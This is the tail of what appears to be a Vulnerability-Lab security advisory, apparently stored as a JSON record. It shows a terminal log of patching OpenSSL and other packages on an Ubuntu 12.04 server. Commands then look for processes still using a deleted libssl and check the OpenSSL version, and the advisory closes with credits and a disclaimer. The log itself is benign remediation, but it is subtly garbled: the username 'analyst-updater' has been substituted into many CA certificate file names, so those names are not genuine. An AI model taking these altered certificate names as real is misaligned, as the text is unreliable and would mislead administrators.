fake-udev\\'\r\nUnpacking replacement udev ...\r\nPreparing to replace ca-certificates 20111211 (using .../ca-certificates_20130906ubuntu0.12.04.1_all.deb) ...\r\nUnpacking replacement ca-certificates ...\r\nPreparing to replace openssh-server 1:5.9p1-5ubuntu1.1 (using .../openssh-server_1%3a5.9p1-5ubuntu1.3_amd64.deb) ...\r\nUnpacking replacement openssh-server ...\r\nPreparing to replace openssh-client 1:5.9p1-5ubuntu1.1 (using .../openssh-client_1%3a5.9p1-5ubuntu1.3_amd64.deb) ...\r\nUnpacking replacement openssh-client ...\r\nPreparing to replace libclamav6 0.97.8+dfsg-1ubuntu1.12.04.1 (using .../libclamav6_0.98.1+dfsg-4ubuntu1~ubuntu12.04.2_amd64.deb) ...\r\nUnpacking replacement libclamav6 ...\r\nPreparing to replace clamav-base 0.97.8+dfsg-1ubuntu1.12.04.1 (using .../clamav-base_0.98.1+dfsg-4ubuntu1~ubuntu12.04.2_all.deb) ...\r\nUnpacking replacement clamav-base ...\r\nPreparing to replace clamav-freshclam 0.97.8+dfsg-1ubuntu1.12.04.1 (using .../clamav-freshclam_0.98.1+dfsg-4ubuntu1~ubuntu12.04.2_amd64.deb) ...\r\n * Stopping ClamAV virus database updater freshclam [ OK ]\r\nUnpacking replacement clamav-freshclam ...\r\nPreparing to replace clamav 0.97.8+dfsg-1ubuntu1.12.04.1 (using .../clamav_0.98.1+dfsg-4ubuntu1~ubuntu12.04.2_amd64.deb) ...\r\nUnpacking replacement clamav ...\r\nPreparing to replace libpq-dev 9.1.12-0ubuntu0.12.04 (using .../libpq-dev_9.1.13-0ubuntu0.12.04_amd64.deb) ...\r\nUnpacking replacement libpq-dev ...\r\nPreparing to replace libpq5 9.1.12-0ubuntu0.12.04 (using .../libpq5_9.1.13-0ubuntu0.12.04_amd64.deb) ...\r\nUnpacking replacement libpq5 ...\r\nPreparing to replace linux-firmware 1.79.10 (using .../linux-firmware_1.79.11_all.deb) ...\r\nUnpacking replacement linux-firmware ...\r\nPreparing to replace php5 5.3.10-1ubuntu3.10 (using .../php5_5.3.10-1ubuntu3.11_all.deb) ...\r\nUnpacking replacement php5 ...\r\nPreparing to replace postgresql-9.1 9.1.12-0ubuntu0.12.04 (using .../postgresql-9.1_9.1.13-0ubuntu0.12.04_amd64.deb) ...\r\n * Stopping PostgreSQL 9.1 database server [ OK ]\r\nUnpacking replacement postgresql-9.1 ...\r\nPreparing to replace postgresql-client-9.1 9.1.12-0ubuntu0.12.04 (using .../postgresql-client-9.1_9.1.13-0ubuntu0.12.04_amd64.deb) ...\r\nUnpacking replacement postgresql-client-9.1 ...\r\nPreparing to replace udisks 1.0.4-5ubuntu2.1 (using .../udisks_1.0.4-5ubuntu2.2_amd64.deb) ...\r\nUnpacking replacement udisks ...\r\nProcessing triggers for man-db ...\r\nProcessing triggers for ureadahead ...\r\nProcessing triggers for ufw ...\r\nSetting up bind9 (1:9.8.1.dfsg.P1-4ubuntu0.8) ...\r\n * Starting domain name service... bind9 [fail]\r\ninvoke-rc.d: initscript bind9, action \\\"start\\\" failed.\r\ndpkg: error processing bind9 (--configure):\r\n subprocess installed post-installation script returned error exit status 1\r\nSetting up libssl-doc (1.0.1-4ubuntu5.12) ...\r\nSetting up libssl-dev (1.0.1-4ubuntu5.12) ...\r\nSetting up libgtk-3-common (3.4.2-0ubuntu0.7) ...\r\nSetting up libgtk-3-0 (3.4.2-0ubuntu0.7) ...\r\nSetting up libgtk-3-bin (3.4.2-0ubuntu0.7) ...\r\nSetting up libnss3-1d (3.15.4-0ubuntu0.12.04.2) ...\r\nSetting up librsvg2-2:i386 (2.36.1-0ubuntu1.1) ...\r\nSetting up librsvg2-common:i386 (2.36.1-0ubuntu1.1) ...\r\nSetting up libmagic1 (5.09-2ubuntu0.3) ...\r\nSetting up file (5.09-2ubuntu0.3) ...\r\nSetting up tzdata-java (2014a-0ubuntu0.12.04) ...\r\nSetting up php5-common (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-cgi (5.3.10-1ubuntu3.11) ...\r\nSetting up openssl (1.0.1-4ubuntu5.12) ...\r\nSetting up apache2.2-bin (2.2.22-1ubuntu1.5) ...\r\nSetting up apache2-utils (2.2.22-1ubuntu1.5) ...\r\nSetting up apache2.2-common (2.2.22-1ubuntu1.5) ...\r\nSetting up apache2-prefork-dev (2.2.22-1ubuntu1.5) ...\r\nSetting up apache2-mpm-prefork (2.2.22-1ubuntu1.5) ...\r\n * Starting web server apache2 [ OK ]\r\nSetting up apache2 (2.2.22-1ubuntu1.5) ...\r\nSetting up libapache2-mod-php5 (5.3.10-1ubuntu3.11) ...\r\n * Reloading web server config apache2 [ OK ]\r\nSetting up php5-cli (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-mysql (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-xsl (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-curl (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-gd (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-sqlite (5.3.10-1ubuntu3.11) ...\r\nSetting up sudo (1.8.3p1-1ubuntu3.6) ...\r\nInstalling new version of config file /etc/init.d/sudo ...\r\nSetting up ifupdown (0.7~beta2ubuntu11) ...\r\nSetting up initramfs-tools-bin (0.99ubuntu13.5) ...\r\nSetting up ca-certificates (20130906ubuntu0.12.04.1) ...\r\nUpdating certificates in /etc/ssl/certs... 21 added, 9 removed; done.\r\nRunning hooks in /etc/ca-certificates/update.d....\r\nAdding debian:Actalis_Authentication_analyst-updater_CA.pem\r\nAdding debian:Buypass_Class_2_analyst-updater_CA.pem\r\nAdding debian:Buypass_Class_3_analyst-updater_CA.pem\r\nAdding debian:CA_Disig_analyst-updater_R1.pem\r\nAdding debian:CA_Disig_analyst-updater_R2.pem\r\nAdding debian:China_Internet_Network_Information_Center_EV_Certificates_analyst-updater.pem\r\nAdding debian:D-TRUST_analyst-updater_Class_3_CA_2_2009.pem\r\nAdding debian:D-TRUST_analyst-updater_Class_3_CA_2_EV_2009.pem\r\nAdding debian:EC-ACC.pem\r\nAdding debian:EE_Certification_Centre_analyst-updater_CA.pem\r\nAdding debian:Hellenic_Academic_and_Research_Institutions_analyst-updaterCA_2011.pem\r\nAdding debian:PSCProcert.pem\r\nAdding debian:Security_Communication_analyst-updaterCA2.pem\r\nAdding debian:StartCom_Certification_Authority_2.pem\r\nAdding debian:StartCom_Certification_Authority_G2.pem\r\nAdding debian:Swisscom_analyst-updater_CA_2.pem\r\nAdding debian:Swisscom_analyst-updater_EV_CA_2.pem\r\nAdding debian:Trustis_FPS_analyst-updater_CA.pem\r\nAdding debian:T-TeleSec_Globalanalyst-updater_Class_3.pem\r\nAdding debian:TURKTRUST_Certificate_Services_Provider_analyst-updater_2007.pem\r\nAdding debian:Verisign_Class_3_Public_Primary_Certification_Authority_2.pem\r\nRemoving debian:cacert.org.pem\r\nRemoving debian:ca.pem\r\nRemoving debian:Equifax_Secure_eBusiness_CA_2.pem\r\nRemoving debian:TC_TrustCenter_Universal_CA_III.pem\r\nRemoving debian:TC_TrustCenter__Germany__Class_2_CA.pem\r\nRemoving debian:TC_TrustCenter__Germany__Class_3_CA.pem\r\nRemoving debian:Verisign_Class_2_Public_Primary_Certification_Authority.pem\r\nRemoving debian:Verisign_Class_4_Public_Primary_Certification_Authority_-_G2.pem\r\nRemoving debian:spi-ca-2003.pem\r\ndone.\r\ndone.\r\nSetting up openssh-client (1:5.9p1-5ubuntu1.3) ...\r\nSetting up openssh-server (1:5.9p1-5ubuntu1.3) ...\r\nssh stop/waiting\r\nssh start/running, process 14149\r\nSetting up libclamav6 (0.98.1+dfsg-4ubuntu1~ubuntu12.04.2) ...\r\nSetting up clamav-base (0.98.1+dfsg-4ubuntu1~ubuntu12.04.2) ...\r\nReplacing config file /etc/clamav/clamd.conf with new version\r\nSetting up clamav-freshclam (0.98.1+dfsg-4ubuntu1~ubuntu12.04.2) ...\r\nInstalling new version of config file /etc/init.d/clamav-freshclam ...\r\nReplacing config file /etc/clamav/freshclam.conf with new version\r\n * Starting ClamAV virus database updater freshclam [ OK ]\r\nSetting up clamav (0.98.1+dfsg-4ubuntu1~ubuntu12.04.2) ...\r\nSetting up libpq5 (9.1.13-0ubuntu0.12.04) ...\r\nSetting up libpq-dev (9.1.13-0ubuntu0.12.04) ...\r\nSetting up linux-firmware (1.79.11) ...\r\nSetting up php5 (5.3.10-1ubuntu3.11) ...\r\nSetting up postgresql-client-9.1 (9.1.13-0ubuntu0.12.04) ...\r\nSetting up postgresql-9.1 (9.1.13-0ubuntu0.12.04) ...\r\n * Starting PostgreSQL 9.1 database server [ OK ]\r\nSetting up openjdk-6-jre-headless (6b30-1.13.1-1ubuntu2~0.12.04.3) ...\r\nSetting up openjdk-6-jre-lib (6b30-1.13.1-1ubuntu2~0.12.04.3) ...\r\nSetting up icedtea-6-jre-cacao (6b30-1.13.1-1ubuntu2~0.12.04.3) ...\r\nSetting up icedtea-6-jre-jamvm (6b30-1.13.1-1ubuntu2~0.12.04.3) ...\r\nSetting up udev (175-0ubuntu9.5) ...\r\nudev stop/waiting\r\nudev start/running, process 16013\r\nRemoving \\'diversion of /sbin/udevadm to /sbin/udevadm.upgrade by fake-udev\\'\r\nupdate-initramfs: deferring update (trigger activated)\r\nSetting up udisks (1.0.4-5ubuntu2.2) ...\r\nSetting up initramfs-tools (0.99ubuntu13.5) ...\r\nupdate-initramfs: deferring update (trigger activated)\r\nProcessing triggers for libc-bin ...\r\nldconfig deferred processing now taking place\r\nProcessing triggers for libgdk-pixbuf2.0-0:i386 ...\r\nProcessing triggers for initramfs-tools ...\r\nupdate-initramfs: Generating /boot/initrd.img-3.2.0-60-generic\r\nSetting up bind9 (1:9.8.1.dfsg.P1-4ubuntu0.8) ...\r\n * Starting domain name service... bind9 [fail]\r\ninvoke-rc.d: initscript bind9, action \\\"start\\\" failed.\r\ndpkg: error processing bind9 (--configure):\r\n subprocess installed post-installation script returned error exit status 1\r\nErrors were encountered while processing:\r\n bind9\r\nE: Sub-process /usr/bin/dpkg returned an error code (1)\r\nanalyst-updater@h2072833:~# ps uwwp $(sudo find /proc -maxdepth 2 -name maps -exec grep -HE \\'/libssl\\\\.so.* \\\$deleted\\\$\\' {} \\\\; | cut -d/ -f3 | sort -u)\r\nERROR: List of process IDs must follow p.\r\n********* simple selection ********* ********* selection by list *********\r\n-A all processes -C by command name\r\n-N negate selection -G by real group ID (supports names)\r\n-a all w/ tty except session leaders -U by real user ID (supports names)\r\n-d all except session leaders -g by session OR by effective group name\r\n-e all processes -p by process ID\r\nT all processes on this terminal -s processes in the sessions given\r\na all w/ tty, including other users -t by tty\r\ng OBSOLETE -- DO NOT USE -u by effective user ID (supports names)\r\nr only running processes U processes for specified users\r\nx processes w/o controlling ttys t by tty\r\n*********** output format ********** *********** long options ***********\r\n-o,o user-defined -f full --Group --User --pid --cols --ppid\r\n-j,j job control s signal --group --user --sid --rows --info\r\n-O,O preloaded -o v virtual memory --cumulative --format --deselect\r\n-l,l long u user-oriented --sort --tty --forest --version\r\n-F extra full X registers --heading --no-heading --context\r\n ********* misc options *********\r\n-V,V show version L list format codes f ASCII art forest\r\n-m,m,-L,-T,H threads S children in sum -y change -l format\r\n-M,Z security data c true command name -c scheduling class\r\n-w,w wide output n numeric WCHAN,UID -H process hierarchy\r\nanalyst-updater@h2072833:~# ls -l /proc/*/fd | grep ssl.*(deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\n\r\nanalyst-updater@h2072833:~# openssl version\r\nOpenSSL 1.0.1 14 Mar 2012\r\nanalyst-updater@h2072833:~# sudo reboot\r\n\r\nBroadcast message from analyst-updater@h2072833.ben-kenobi-server.net\r\n (/dev/pts/0) at 12:16 ...\r\n\r\nThe system is going down for reboot NOW!\r\n\r\n\r\n\r\nPicture(s):\r\nhttp://www.vulnerability-lab.com/resources/pictures/1.png\r\nhttp://www.vulnerability-lab.com/resources/pictures/2.png\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nVulnerability Laboratory [Research Team]\r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, \r\neither expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-\r\nLab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business \r\nprofits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some \r\nstates do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation \r\nmay not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases \r\nor trade with fraud/stolen material.\r\n\r\nDomains: www.vulnerability-lab.com \t- www.vuln-lab.com\t\t\t - www.vulnerability-lab.com/register\r\nContact: admin@vulnerability-lab.com \t- support@vulnerability-lab.com \t - research@vulnerability-lab.com\r\nSection: video.vulnerability-lab.com \t- forum.vulnerability-lab.com \t\t - news.vulnerability-lab.com\r\nSocial:\t twitter.com/#!/vuln_lab \t\t- facebook.com/VulnerabilityLab \t - youtube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php\t- vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. \r\nPermission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other \r\nmedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and \r\nother information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), \r\nmodify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.\r\n\r\n \t\t\t\t \tCopyright \u00a9 2012 | Vulnerability Laboratory\r\n\r\n\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}